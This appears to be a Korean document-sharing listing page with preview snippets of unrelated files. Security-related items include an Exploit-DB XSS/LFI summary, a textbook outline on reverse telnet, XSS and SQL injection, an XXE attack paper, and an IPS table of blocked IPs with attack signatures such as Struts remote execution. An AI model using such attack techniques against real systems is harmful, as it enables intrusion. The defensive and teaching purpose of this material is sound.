76 XSS 하 Huge-IT Slider admin.php XSS 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 05 년 6 월에공개된 Exploit-DB 의분석결과, LFI 공격에대한보고개수가가장많았습니다. LFI 공격은대체적으로공격난이도는낮지만공격이성공했을경우시스템의주요파일들이노출되거나파일다운로드가가능해지기때문에위험도가높은공격으로분류됩니다.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Spider For MySQL 실전사용기 피망플러스유닛최윤묵 Spider For MySQL Data Sharding By Spider Storage Engine http://spiderformysql.com/ 성능 8 만 / 분 X 4 대 32 만 / 분 많은 DB 중에왜 spider 를? Source: 클라우드컴퓨팅구 선택의기로 Consistency RDBMS

More information

정보보안개론 5 장

정보보안개론 5 장 정보보안개론 5 장 이장에서다룰내용 1 1 2 2 3 3 4 2 5 3 6 2 HTTP 프로토콜의동작원리를이해한다. 구글과같은검색엔진을통해정보를수집하는방법을알아본다. 웹해킹에서파일접근과관련된공격을살펴본다. 리버스텔넷을이해한다. 웹에서의인증의구조와이를우회하는방법을알아본다. 패킷변조를통해가능한공격을살펴본다. 7 XSS 공격및 SQL 삽입공격을살펴본다. Section

More information

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2.

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2. 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2. 3Rabbitz Book 애플리케이션파일다운로드하여압축파일을풀고복사합니다. 3. 3Rabbitz Book 실행합니다.

More information

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. 기술문서 14. 11. 10. 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 dokymania@naver.com I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. Exploit 5 마. 피해 6 III. 결론 6 가. 권고사항 6 I. 소개 가. 역자 본문서는

More information

SPECweb Install

SPECweb Install SPECweb2005 Install & Configure Guide in Linux(fedora 13) Version # 작성일작성자 E-mail 설명 1.00 2011.3.3 김호연 hykim@q.ssu.ac.kr 첫버전작성함 본문서는 SPECweb2005를설치하고구동하는과정을설명합니다. 본문서의목적은, 어떠한시행착오없이 SPECweb2005을보다쉽게사용할수있도록함에있습니다.

More information

InsertColumnNonNullableError(#colName) 에해당하는메시지출력 존재하지않는컬럼에값을삽입하려고할경우, InsertColumnExistenceError(#colName) 에해당하는메시지출력 실행결과가 primary key 제약에위배된다면, Ins

InsertColumnNonNullableError(#colName) 에해당하는메시지출력 존재하지않는컬럼에값을삽입하려고할경우, InsertColumnExistenceError(#colName) 에해당하는메시지출력 실행결과가 primary key 제약에위배된다면, Ins Project 1-3: Implementing DML Due: 2015/11/11 (Wed), 11:59 PM 이번프로젝트의목표는프로젝트 1-1 및프로젝트 1-2에서구현한프로그램에기능을추가하여간단한 DML을처리할수있도록하는것이다. 구현한프로그램은 3개의 DML 구문 (insert, delete, select) 을처리할수있어야한다. 테이블데이터는파일에저장되어프로그램이종료되어도사라지지않아야한다.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 MySQL - 명령어 1. 데이터베이스관련명령 2. 데이터베이스테이블관련명령 3. SQL 명령의일괄실행 4. 레코드관련명령 5. 데이터베이스백업및복원명령 1. 데이터베이스관련명령 데이터베이스접속명령 데이터베이스접속명령 mysql -u계정 -p비밀번호데이터베이스명 C: > mysql -ukdhong p1234 kdhong_db 데이터베이스생성명령 데이터베이스생성명령

More information

저작자표시 - 비영리 - 변경금지 2.0 대한민국 이용자는아래의조건을따르는경우에한하여자유롭게 이저작물을복제, 배포, 전송, 전시, 공연및방송할수있습니다. 다음과같은조건을따라야합니다 : 저작자표시. 귀하는원저작자를표시하여야합니다. 비영리. 귀하는이저작물을영리목적으로이용할

저작자표시 - 비영리 - 변경금지 2.0 대한민국 이용자는아래의조건을따르는경우에한하여자유롭게 이저작물을복제, 배포, 전송, 전시, 공연및방송할수있습니다. 다음과같은조건을따라야합니다 : 저작자표시. 귀하는원저작자를표시하여야합니다. 비영리. 귀하는이저작물을영리목적으로이용할 저작자표시 - 비영리 - 변경금지 2.0 대한민국 이용자는아래의조건을따르는경우에한하여자유롭게 이저작물을복제, 배포, 전송, 전시, 공연및방송할수있습니다. 다음과같은조건을따라야합니다 : 저작자표시. 귀하는원저작자를표시하여야합니다. 비영리. 귀하는이저작물을영리목적으로이용할수없습니다. 변경금지. 귀하는이저작물을개작, 변형또는가공할수없습니다. 귀하는, 이저작물의재이용이나배포의경우,

More information

슬라이드 1

슬라이드 1 QR 코드를통한간편로그인 2018. 11. 7 지도교수 : 이병천교수님 4 조 Security-M 지승우이승용박종범백진이 목 차 조원편성 주제선정 비밀번호가뭐였지? 이런일없이조금더쉽게로그인할수있는방법은없을까? 주제선정 ID와패스워드에의한로그인방식의획기적인변화필요 문자형 ID와패스워드 QR Code 등활용 간편한타겟인식및암기식보안체계의불편극복 인증방식의간소화로다양한분야에서활용가능

More information

단계

단계 본문서에서는 Tibero RDBMS 에서제공하는 Oracle DB Link 를위한 gateway 설치및설정방법과 Oracle DB Link 사용법을소개한다. Contents 1. TIBERO TO ORACLE DB LINK 개요... 3 1.1. GATEWAY 란... 3 1.2. ORACLE GATEWAY... 3 1.3. GATEWAY 디렉터리구조...

More information

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8 차단 IP 국적 공격유형 목적지포트 IPS 룰 222.119.190.175 한국 서비스취약점공격 TCP/110 #14713(POP3 Login Brute Force Attempt-2/3(count 30 seconds 10)) 52.233.160.51 네덜란드 웹해킹 TCP/80 Apache Struts Jakarta Multipart Parser Remote

More information

본교재는수업용으로제작된게시물입니다. 영리목적으로사용할경우저작권법제 30 조항에의거법적처벌을받을수있습니다. [ 실습 ] 스위치장비초기화 1. NVRAM 에저장되어있는 'startup-config' 파일이있다면, 삭제를실시한다. SWx>enable SWx#erase sta

본교재는수업용으로제작된게시물입니다. 영리목적으로사용할경우저작권법제 30 조항에의거법적처벌을받을수있습니다. [ 실습 ] 스위치장비초기화 1. NVRAM 에저장되어있는 'startup-config' 파일이있다면, 삭제를실시한다. SWx>enable SWx#erase sta [ 실습 ] 스위치장비초기화 1. NVRAM 에저장되어있는 'startup-config' 파일이있다면, 삭제를실시한다. SWx>enable SWx#erase startup-config Erasing the nvram filesystem will remove all configuration files Continue? [confirm] ( 엔터 ) [OK] Erase

More information

<32355FC8A8C6E4C0CCC1F620B1B8C3E020BAB8BEC820B0A1C0CCB5E52E687770>

<32355FC8A8C6E4C0CCC1F620B1B8C3E020BAB8BEC820B0A1C0CCB5E52E687770> 안전한홈페이지운영을위한 웹서버설정및개발보안가이드 (Ver. 1.0) 2007. 10 출처 : CrossWeave 홈페이지개발보안정책가이드 (Ver. 1.3) Pusan National University Information Technology Center 1 / 13 목 차 Ⅰ. 개요 3 Ⅱ. 정보보호를고려한홈페이지구축의필요성 4 Ⅲ. 홈페이지구축및운영기본가이드

More information

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation 1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation Board(EVB B/D) 들과 TCP/IP Protocol로연결되며, 연결된 TCP/IP

More information

Web Scraper in 30 Minutes 강철

Web Scraper in 30 Minutes 강철 Web Scraper in 30 Minutes 강철 발표자 소개 KAIST 전산학과 2015년부터 G사에서 일합니다. 에서 대한민국 정치의 모든 것을 개발하고 있습니다. 목표 웹 스크래퍼를 프레임웍 없이 처음부터 작성해 본다. 목표 웹 스크래퍼를 프레임웍 없이 처음부터 작성해 본다. 스크래퍼/크롤러의 작동 원리를 이해한다. 목표

More information

슬라이드 1

슬라이드 1 쇼핑몰, 딥줌그리고 Azure Doubleguy 이철성 Forbiz 싞훈식 Overview 기존서비스들의고민 클라우드의장점 Windows.Azure.com 의사용방법 PHP Azure SDK 사용방법 ( 이클립스를이용한 ) PHP Azure Command Prompt 를이용한패키징 상호연동데모 DeepZoom Composing Services 실버라이트딥줌타일이미지생성서버혹은서비스

More information

슬라이드 1

슬라이드 1 Tadpole for DB 1. 도구개요 2. 설치및실행 4. 활용예제 1. 도구개요 도구명 소개 Tadpole for DB Tools (sites.google.com/site/tadpolefordb/) 웹기반의데이터베이스를관리하는도구 Database 스키마및데이터관리 라이선스 LGPL (Lesser General Public License) 특징 주요기능

More information